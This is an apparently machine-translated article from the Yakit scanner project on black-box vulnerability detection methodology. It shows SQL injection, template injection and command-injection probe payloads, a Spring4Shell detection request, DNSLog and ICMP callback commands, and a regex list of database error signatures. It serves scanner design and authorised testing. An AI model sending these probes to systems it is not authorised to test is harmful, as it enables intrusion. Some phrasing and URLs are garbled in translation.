Abstract black box vulnerability scanning and risk technology assessment methodology

As a technical boy who has long struggled with automated detection/mining solutions for various vulnerabilities, we will encounter many problems when writing a “scanner”, such as

How to ensure that your payload is harmless?
How to balance the contradictory relationship between outsourcing and “detection rate”?
How to trigger WAF as little as possible?
How to analyze as many security issues as possible under authorization (or can ignore WAF)?
Are there “best practices” for different manifestations of vulnerabilities?

In this article I will try to give some of my own answers to the above questions:

Classified by vulnerability detection behavior:

The classification of vulnerabilities is actually a very strange topic. Many vulnerabilities are essentially the same, including SQL injection, template injection, code injection, XSS, even command injection, and deserialization, all of which execute “user input as code”. If we accept this thinking model, we can find that the exploitation of these vulnerabilities is as simple as constructing Payload => Request => Check the behavior triggered by the vulnerability.

Although we can classify vulnerabilities according to: “Trigger scenario classification”, “Trigger language classification”, “Framework classification”, in this section we will propose an “alternative” vulnerability classification method, “Vulnerability Detection Behavior Classification”.

Maybe this word sounds a bit unfamiliar. We divide vulnerability detection into the following situations so that everyone can easily understand it.

The payload causes the vulnerability to have a clear echo characteristic string, and the echo changes with the string.
For example {{2*2}} If 4 is returned, it means it is an SSTI
If `expr 2 + 2` echoes 4, it may be a *unix command injection
If Payload is a name’, SQL error is returned directly, indicating that SQL Error Based is possible.
The payload causes the vulnerability to be echoed, but the characteristics are not obvious, but a Boolean judgment can still be constructed:
For example, the page of {{2*2}} is the same as 4, but it is different from the 5 output by {{2 + 3}}. This can also indicate SSTI.
If the results of SQL injection name=tom’and’1’=’1 and name=tom’and’2’=’1 are not the same (not similar), and the former is very similar to name=tom, we think this is a possibility “SQL Injection Boolean Based”
If there is no response from this article, an outbound request cannot be constructed. A delayed request can be constructed:
The most common one is TimeBased SQL Injection. We construct name=tom’and/**/sleep(3) # If the injection is successful, it will sleep for at least 3 seconds (you can think about why you say “at least”?)
In addition, benchmark is usually synonymous with sleep, but this solution is generally not recommended.
It is worth noting that generally speaking, if sleep can be executed during template injection, it generally means that arbitrary code can be executed. A more “accurate” detection method can be used, and it is not necessary to use the “sleep” method. After all, when designing templates, we never want users to be “blocked”.
There is no text echo, but outbound requests can be constructed.
DNS outgoing network: For example, the most familiar log4j2 is used to determine the commonly used DNSLog method.
TCP / HTTP outgoing network judgment: random port trigger https://m.freebuf.com/sectool/320955.html?hmsr=joyk.com & amp;utm_source=joyk.com & amp;utm_medium=referral (replace with public account article)
ICMP outgoing network: Try to execute the command ping 192.168.1.1 to determine whether ICMP can go out of the network, to determine whether the command has been executed, or whether an ICMP tunnel can be constructed?
Special supplements: no text/no echo/no outgoing network/no DNS
This situation does not mean that the vulnerability is “undetectable”: Case: The “echo chain” often used in Java deserialization is a special payload that can transform a vulnerability that does not leave the network and has no echo into an “echo chain” that has no echo. Echoes and obvious features”.

Why are they classified this way?

This classification method is of great significance for vulnerability detection. We can construct “different” Payloads to perform vulnerability detection on parameters. During the vulnerability detection process, these parameters affect the behavior of the application.

With such an abstraction and classification basis, we can predict or enumerate different detection methods corresponding to different behaviors, predict the triggering method and detection method of a Payload, and quickly determine whether a “vulnerability” can be detected on a large scale or only. Can be detected through Fuzz.

Payload is the core of changing “detection behavior”

After readers accept the above idea of classifying detection according to vulnerability appearance, we will analyze the problem of black box vulnerability detection more deeply and find that even if the trigger point of the same vulnerability is the same, the shape of different payloads is actually completely different:

Very typically, we take the familiar Java deserialization as an example.

If ysoserial generates a deserialization stream, execute ping http://xxx.dnslog.cn or curl http://xxx.dnslog.cn, which is commonly used DNSLog to detect vulnerabilities.
If Java is used to construct the echo chain, the Java code is executed through the deserialization process, and the execution result is found and “put” back to the original trigger request.
It can even be said that ping 192.168.1.1 can be judged by whether the target IP receives the corresponding ICMP packet.

After we understand this truth, we can think carefully about “how the Payload should be constructed to achieve better detection efficiency.”

Measurement of vulnerability detection methods

Metrics similar to but different from machine learning methods, how to measure a vulnerability detection method?

False negative rate (lower is better): Vulnerabilities that should have been detected, but were not.
False positive rate (lower is better): A vulnerability is reported when there should not actually be one.
Recall rate (the higher the better): measures whether the vulnerability detection method can stably re-detect a vulnerability and is used to indicate the stability of the vulnerability detection algorithm.
Complexity (the lower, the better): Construct the conditions required for detection, such as anti-connection platform support, etc.

Generally speaking, the above three indicators have different advantages for the “vulnerability detection” classification method we mentioned. We use 10 points as the full score detection solution:

	False negative rate score	False positive rate score	Recall rate score (excluding network factors)	Complexity score	Overall performance (10 points)	Defects
There are characteristic echoes (including Echo chain)	9 (SSRF’s own machine’s trigger scenario cannot be processed)	10	10	10	9.75
Boolean echo	8 (depends on the algorithm that booleans the application response)	8 (depends on the algorithm that Booleanizes the application response)	10	8 (the algorithm is complex)	8.5	Boolean algorithm is the core, for example (page similarity comparison)
No echo (only delayed detection)	8 (limited to production environment Sensitive)	6 (Sensitive to the production environment, greatly affected by network fluctuations)	8 (Basically stable, calculation/Sleep is not stable enough)	9 (Note Don’t harm the business)	7.75	Sleep / benchmark There will be big problems when encountering Bad SQL. Different SQL statement injection positions have different Sleep times, and special construction of Payload is required
Multi-protocol outgoing network reverse connection	9 (limited by the target’s outgoing network restrictions)	9 (Token-like mechanism can Reduce false alarms to a great extent)	10	4 (Requires reverse connection platform configuration, high requirements for the reverse connection platform)	8	Payloads of multiple protocols need to be tried, and arranging them according to general types and hazards requires careful consideration.

Based on experience, we constructed the above scoring table: We found that from a vulnerability detection perspective:

Characteristic echo (echo chain) is the optimal detection method
As an alternative: algorithm-dependent boolean echo and anti-connection detection are also acceptable
Don’t use delayed detection to detect vulnerabilities unless absolutely necessary

How to construct an excellent Payload

When we are familiar with the topics mentioned above, readers should have a preliminary understanding of “excellent vulnerability detection algorithms”, so let’s move from theory to practice: how to construct an excellent payload?

Guessing and pushing boundaries

The boundary is a key node that many payloads can trigger. Being able to jump out of the boundary is actually a key node that the payload can execute.

During the testing process, we need to scan for certain vulnerabilities. In fact, we need to be familiar with its scenarios and look for boundaries as breakthrough points. The author lists some scenarios so that you can feel what boundaries there may be and what the closure of these boundaries should look like.

For example in SQL, a common boundary is

space
/**/
String single quotes closed
Double quotes (double quotes are not commonly used because of escaping issues)
Brackets (multi-condition logical query)
Backticks (used to mark class descriptions)
Comment
Semicolon (stacked multiple statements)

Similarly, our common string boundaries in XSS are:

Angle brackets and closing tags
Double quotes single quotes (jump out of attribute values)
Line break (jump out of the current statement in JS)
Backticks, instead of bracket boundary enforcement, etc.
…

In addition, punctuation marks or invisible conceits that we often use to bypass certain regular or other restrictions are very good test boundaries:

In Yakit Fuzz, we can directly generate all characters through {{range(00,ff)}} to try to break the boundary, or pass {{range (00,20)}} and {{range(80,ff)) to orient the invisible ego around the boundary. Or use {{punc}} to generate all punctuation to push the boundaries

Construct a payload with echoed characteristics

In order to facilitate everyone’s understanding, we briefly summarized several common scenarios:

1. Illegal input error -> Detection error message:
This situation is common in SQL injection based on error reporting. For example, if we enter a ‘ and if something like SQL’s Syntax Error appears on the page, we can temporarily think that our input destroys the boundaries of the SQL statement.
In Yakit, we use a very common set of error injection detection rules SQL Injection Detection (Zero Protection)

DBMS_ERRORS = {
    "MySQL": [`SQL syntax.*MySQL`, `Warning.*mysql_.*`, `valid MySQL result`, `MySqlClient\.`],
    "PostgreSQL": [`PostgreSQL.*ERROR`, `Warning.*\Wpg_.*`, `valid PostgreSQL result`, `Npgsql\.`],
    "Microsoft SQL Server": [`Driver.* SQL[\-\_\ ]*Server`, `OLE DB.* SQL Server`, `(\W|\A)SQL Server.*Driver`, `Warning. *mssql_.*`, `(\W|\A)SQL Server.*[0-9a-fA-F]{8}`, `(?s)Exception.*\WSystem\.Data\.SqlClient\. `, `(?s)Exception.*\WRoadhouse\.Cms\.`],
    "Microsoft Access": [`Microsoft Access Driver`, `JET Database Engine`, `Access Database Engine`],
    "Oracle": [`\bORA-[0-9][0-9][0-9][0-9]`, `Oracle error`, `Oracle.*Driver`, `Warning.*\Woci_. *`, `Warning.*\Wora_.*`],
    "IBM DB2": [`CLI Driver.*DB2`, `DB2 SQL error`, `\bdb2_\w + \(`],
    "SQLite": [`SQLite/JDBCDriver`, `SQLite.Exception`, `System.Data.SQLite.SQLiteException`, `Warning.*sqlite_.*`, `Warning.*SQLite3::`, `\[SQLITE_ERROR\ ]`],
    "Sybase": [`(?i)Warning.*sybase.*`, `Sybase message`, `Sybase.*Server message.*`],
}

2. Construct digital calculations -> Check calculation results
Constructing mathematical operations is actually a very good solution. When we find the injection point as id=1, if we construct the input id=53456-53455, the two pages are the same, but when we construct id=53456, the page And different. We have reason to believe that number crunching was performed!
In fact, addition, subtraction, multiplication and division are not just used casually. The three characters + * / are usually reserved characters in some grammars, and are often used to separate, mark or connect. On the contrary, the minus sign is used the least, so subtraction calculations should be easier to construct.
In fact, there are many detection methods during construction. We can look at the following case list. We list the execution and actual situations of some common expressions: Note that we still highly recommend using subtraction operations for calculations, not only because + / * is often used as a reserved character, and 2022-01-12 is also a good means of confusion. It works both as a math operation and messes well with dates.

Scenario	Calculation expression	Remarks
*unix shell	expr 123 – 20 – 3	Spaces cannot be omitted
echo ${random-`expr 123 – 2 – 1`}	Use variable assignment to construct Linux Payload
echo 123-1-1\|bc	Bc is relatively simple, but this usage requires The pipe symbol is used.
echo $((123-23-3))	Regular expression calculation
echo $[123-23-3]	Regular expression calculation
Windows calculation expression	set /a 123- 20-3	CMD available
Expression template injection: Jinja2 / Tornado	{{ 2023-20-3}}	Jinja2 / Tornado
{% raw 2023-20-3 %}	Tornado expression Formula calculation
Compatible with injected EL expressions	${2023-20-3}	EL common expressions
JSP expression	<%=123-20-3 %>	JSP expression
PHP expression
Java FreeMaker expression	${(123-23-1)?c}	Essentially it is FreeMaker’s call to c in the digital built-in function
${123123.456456?string[“0”]}	This is an integer operation, the result is 123123, and should not contain 456456
Java Velocity expression	#set($random=123-12-12)$random	Contains two steps, creating variables + outputting results. The #set instruction does not have an #end statement.
EJS	<%- 123-12-1 %>	EJS does not escape
<%= 123-12-1 %>	EJS escaping (HTML encoding, etc.)

3. Letter string calculation -> Check calculation results
Just like numbers, the echo we expect can be obtained through random expression operations. In the same place, we can also obtain echo through constructed alphabetical operations.
I won’t go into details about the specific solution. In fact, for the above content, you can supplement the string operations of the corresponding template at any time.

4. Use your own status to echo

This is a very typical and interesting echo method:

Java deserialization echo chain is this type of echo, for example: in Tomcat echo chain: echo through ThreadLocal Response or Weblogic, the idea is basically similar.
The content printed by SSRF’s own port also displays this type of echo. However, relatively speaking, although SSRF can print specific content, we do not know what this “specific content” is. At the same time, it is limited by the HTTP protocol, which is not an easy task.

Construct Boolean feature Payload

Boolean Algorithm

The essence of Boolean feature payload lies in how to turn irregular input into measurable True/False.

We often have many methods and points that need attention to do this:

Directly calculate the similarity of the Body of the previous and later HTTPResponse, and set a threshold, usually 0.98
The similarity algorithms for different Body types that mix status codes are different. For example, if the status codes before and after are different, there is a high probability that they will also be different.
There are usually many strange and useless features associated with the data. Algorithms based on page comparison can shield these problems through generalization and other means.

Admittedly, this is not simple to do. We can assume that we construct an algorithm that uses the above factors as the overall weight:

Similarity comparison items	Weight	Reasons/Remarks
Status code	0.3	If the status codes of the two pages are different, it basically means that there is a relatively large problem at the root, and it should be when the weight is relatively large
URL (Schema + Path + URI)	0.2	The URL is the same but the status code is different. It may be that the request content is indeed different, causing the response to fork.
Body	0.4	The comparison methods determined by Content-Type are different: JSON is suitable for comparing XML and HTML classes after sorting Suitable for two comparison options: direct similarity calculation comparison of text with *ML tag + taking out all strings for comparison (SQLMAP preprocessing)
Header	0.1	The various items in Headers should also have an impact on the weight. Of course, the impact mechanisms of different Headers are also different: we can think that Set-Cookie and Content-Type have a high proportion. We tentatively set 0.33 and 0.33, and other headers together account for 0.34. At the same time, we should also exclude the impact of GZIP and Base64

Through the above thinking, we have initially constructed a technical solution for page similarity comparison: Of course, this is most likely not the final technical solution. We should implement the algorithm on this basis and improve the algorithm in actual combat.

>= In the version of yak-1.0.14-sp1, we can use judge.CompareRaw to call this method to directly compare the two data packets and obtain a floating point number.

We found that we can calculate the similarity of two packets (HTTP streams), which is a percentage or a floating point number, with a minimum value of 0 and a maximum value of 1. We commonly use:

You can think of >=0.95 as “the same”, which corresponds to “True” in the Boolean value.
>= 0.85 can be considered as “similar”, and can also correspond to “True” in certain scenarios
When >=0.7, we consider them to be “basically similar”, and generally can be considered “True” in loose scenarios.
In other cases, we can consider them “not the same”

How to use Boolean algorithm for identification?

Case: Discussion on CVE-2022-22965 (Spring-Core-RCE JDK9 + ) detection:

There are currently three main detection methods:

The “exploitation” method of writing files + connecting to WebShell
Error reporting method:
class.module.classLoader.URLs[0] type error
class.module.class.module.class.module …* Abstract class loading error
class.module.classLoader.DefaultAssertionStatus type error
DNS anti-connection detection: class.module.classLoader.resources.context.configFile=http://*.http://dnslog.cn/test &class.module.classLoader.resources.context.configFile.content.aaa =xxx

On the surface, the first method will have an impact on the business and is not recommended. The third method has slight requirements on infrastructure. Our most ideal detection solution is the “error reporting method” for detection.

Why is an error reported instead of a “characteristic string” echo?

This is because if the execution is successful, we cannot see what the “features” are, nor can we know the location of the echo. The characteristics of the echoed results are not obvious enough. They are not the calculation results we determined, but the “error results”

However, error reports can be intercepted globally by the Spring framework and redirected to the home page. Based on this consideration, there are actually quite a lot of false negatives in the error reporting method, and even when the structure is unreasonable, false positives will still exist.

But if we think that the target will definitely return an error result, based on this consideration, how can we use Boolean to determine whether the vulnerability exists? In fact, the reason is very simple. Construct the experimental group and the control group and use the control variable method.

Normal requests are recorded as Positive requests (P1)
In order to ensure stability, there should be multiple normal requests (P2/P3)
Type Payload request set to A

So if, we can think that P1 / P2 / P3 are all the same (similar) to each other, when the payload is sent, the corresponding A request should not be the same (similar) to the others (P1/P2/P3). We can therefore distinguish a “different payload”.

More specifically, let’s take class.module.classLoader.DefaultAssertionStatus as an example. We need to send three requests:

P1: class.module.classLoader.DefaultAssertionStatus=True
P2: class.module.classLoader.DefaultAssertionStatus=False
A: class.module.classLoader.DefaultAssertionStatus=123

P1 / P2 are requests that should not have errors, and A is a request that should report an error. So if there is a loophole, it should be in line with our experimental process.

P1 and P2 are very similar, and A is not similar to either P1 or P2.

Of course, P1 / P2 can also add another control group if possible, and the original request does nothing “results” (P3) to better distinguish.

Case 2: Design a Boolean SQL detection solution

After we understand the basic Boolean detection principles, let’s look at a classic case again: Boolean-Based SQL Injection. We use id=1 as the trigger point to design an experimental plan:

id=1 is P1
id=1 and 1=1/**/ is P2
id=1 and 2=1 is Negative (N1)

So at the most basic level, we can think of

P1 is the same/similar to P2
P1 is not the same as N1
P2 is not the same as N1.

After these three judgments, we can initially screen out whether N1 is “problematic”. Then continuing with deeper verification can expand the Positive group. We can test id=1 and 1=2023-2020-1-1 to judge the equation. This is also for other structures that can “better judge”.

Of course, after our rough screening, we can get questions such as “how to break through the boundaries”. We can convert the above results into simpler methods, such as union select 1,2,3,4,5… — this type of controllable return Appears to be more accurate detection.

Short summary

In fact, the “experimental plan” we designed above is not completely zero false positives and zero false negatives. When implementing it, you need to fully consider the situation of the pruning algorithm and the “instability” problem caused by network factors.

Multi-protocol outgoing network anti-connection detection vulnerability:

At present, multi-protocol outbound detection is mainly divided into three major protocols:

UDP anti-connection detection: represented by DNS protocol
TCP anti-connection detection: RMI / LDAP / HTTP / random port anti-connection detection
ICMP reverse connection: Based on ICMP packets of a specific length, ping -s [len] http://example.com

This part is actually not complicated, it can even be said to be a very simple construction method, but you don’t need to stick to what the specific Payload should look like, or what the specific protocol should be. Let’s use two relatively “rare” ones. The reverse connection trigger method is used to introduce this part.

TCP Kill: Random reconnection of non-monitoring ports without feature Token

In fact, for most scenarios except DNS, the vast majority of anti-connection “detections” use TCP as the basic protocol. We can achieve complex compatibility with multiple application writes by implementing TCP-based protocols. :

For common HTTP reverse connection detection, we generally use Path as the marking position of Token to distinguish “which vulnerability is triggered”: http://example.com/[token]
Common RMI is similar to jndi:rmi://http://example.com/[token]
…

But in fact, the various use cases above require users to specifically monitor a certain port to implement. In the exchange with @Naiquanshifu, we implemented a more “universal” detection method and successfully implemented it. Engineering implementation:

Out of the Five Elements and Three Realms: ICMP Reverse Connection and Tunnel

Similarly, inspired by the solution proposed above, let’s put aside TCP. The ICMP protocol can also have similar technical solutions. The only difference is that ICMP does not involve ports. So how to trigger ICMP reverse connection in a similar way? Then distinguish this ICMP connection/data packet, which vulnerability does it correspond to?

We use the simplest trigger method: the ping command. When we set the -s parameter, we can specify the packet type for ICMP. In other words, we can pre-set a random value as the packet size of ping. If ping The size of the incoming data packet just matches the “random value” we set, which means that our reverse connection is successful.

If we describe the above process using a simple diagram, the process is actually very easy to understand.

WHY?

Why do we do this? Many times, when outbound TCP and UDP fail, ICMP tunnels can be used to transmit certain data. So how to test whether the ICMP tunnel can pass through the external network? Using the method proposed in this article is a relatively quick way to achieve this goal.

Summary

In this article, we have omitted the detection related to “time injection”. The reason has been introduced in “Vulnerability Detection Behavior Classification” and will not be repeated here.

This article does not actually do too much technical discussion on the specific technical solutions, but is intended to inspire others. Thank you for your help in the actual communication and implementation process with Yakit users. I hope this article can serve as part of the theoretical basis for your “vulnerability detection” technical solution.

Yak official resources

Yak language official tutorial:
https://yaklang.com/docs/intro/
Yakit video tutorial:
https://space.bilibili.com/437503777
Github download address:
https://github.com/yaklang/yakit
Yakit official website download address:
https://yaklang.com/
Yakit installation documentation:
https://yaklang.com/products/download_and_install
Yakit usage documentation:
https://yaklang.com/products/intro/
Quick FAQ:
https://yaklang.com/products/FAQ